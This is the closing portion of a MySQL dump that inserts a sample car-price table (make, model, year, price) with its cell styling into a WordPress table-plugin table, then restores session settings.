INSERT INTO `wp_wptm_tables` VALUES (1,2,'My table','[[\"#\",\"Make\",\"Model\",\"Year\",\"Price\"],[\"1\",\"Honda\",\"Accord\",\"2009\",\"$12000\"],[\"2\",\"Toyota\",\"Camry\",\"2012\",\"$14900\"],[\"3\",\"Hyundai\",\"Elantra\",\"2010\",\"$22000\"],[\"4\",\"Honda\",\"Accord\",\"2009\",\"$12000\"],[\"5\",\"Toyota\",\"Camry\",\"2012\",\"$14900\"],[\"6\",\"Hyundai\",\"Elantra\",\"2010\",\"$22000\"],[\"7\",\"Honda\",\"Accord\",\"2009\",\"$12000\"],[\"8\",\"Toyota\",\"Camry\",\"2012\",\"$14900\"]]','{\"table\":{\"alternate_row_even_color\":\"#fafafa\",\"use_sortable\":\"1\",\"width\":592},\"rows\":{\"0\":[\"0\",{\"height\":29,\"width\":50}],\"1\":[\"1\",{\"height\":29,\"width\":122}],\"2\":[\"2\",{\"height\":29,\"width\":137}],\"3\":[\"3\",{\"height\":29,\"width\":133}],\"4\":[\"4\",{\"height\":29,\"width\":150}],\"5\":[\"5\",{\"height\":29,\"width\":50}],\"6\":[\"6\",{\"height\":29}],\"7\":[\"7\",{\"height\":29}],\"8\":[\"8\",{\"height\":29}]},\"cols\":{\"0\":[0,{\"width\":50}],\"1\":[1,{\"width\":122}],\"2\":[2,{\"width\":137}],\"3\":[3,{\"width\":133}],\"4\":[4,{\"width\":150}]},\"cells\":{\"0!0\":[0,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"2px solid #707070\",\"cell_background_color\":\"#ffffff\",\"cell_vertical_align\":\"middle\"}],\"0!1\":[0,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"2px solid #707070\",\"cell_background_color\":\"#ffffff\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\"}],\"0!2\":[0,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"2px solid #707070\",\"cell_background_color\":\"#ffffff\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\"}],\"0!3\":[0,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"2px solid #707070\",\"cell_background_color\":\"#ffffff\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\"}],\"0!4\":[0,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"2px solid #707070\",\"cell_background_color\":\"#ffffff\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\"}],\"1!0\":[1,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"1!1\":[1,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"1!2\":[1,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"1!3\":[1,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"1!4\":[1,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"2!0\":[2,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"2!1\":[2,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"2!2\":[2,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"2!3\":[2,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"2!4\":[2,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"3!0\":[3,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"3!1\":[3,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"3!2\":[3,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"3!3\":[3,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"3!4\":[3,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"4!0\":[4,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"4!1\":[4,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"4!2\":[4,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"4!3\":[4,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"4!4\":[4,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"5!0\":[5,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"5!1\":[5,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"5!2\":[5,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"5!3\":[5,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"5!4\":[5,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"6!0\":[6,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"6!1\":[6,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"6!2\":[6,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"6!3\":[6,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"6!4\":[6,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"7!0\":[7,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"7!1\":[7,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"7!2\":[7,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"7!3\":[7,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"7!4\":[7,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"8!0\":[8,0,{\"width\":50,\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"8!1\":[8,1,{\"width\":122,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"8!2\":[8,2,{\"width\":137,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"8!3\":[8,3,{\"width\":133,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}],\"8!4\":[8,4,{\"width\":150,\"cell_text_align\":\"center\",\"height\":30,\"cell_padding_top\":\"3\",\"cell_padding_right\":\"3\",\"cell_padding_bottom\":\"3\",\"cell_padding_left\":\"3\",\"cell_font_color\":\"#333333\",\"cell_border_bottom\":\"1px solid #d6d6d6\",\"cell_vertical_align\":\"middle\"}]}}','','2314f02868819dbdc70e81d33de6b234','','2014-07-13 18:07:12','2014-07-13 18:07:12',1,0);
/*!40000 ALTER TABLE `wp_wptm_tables` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-06-16 19:53:08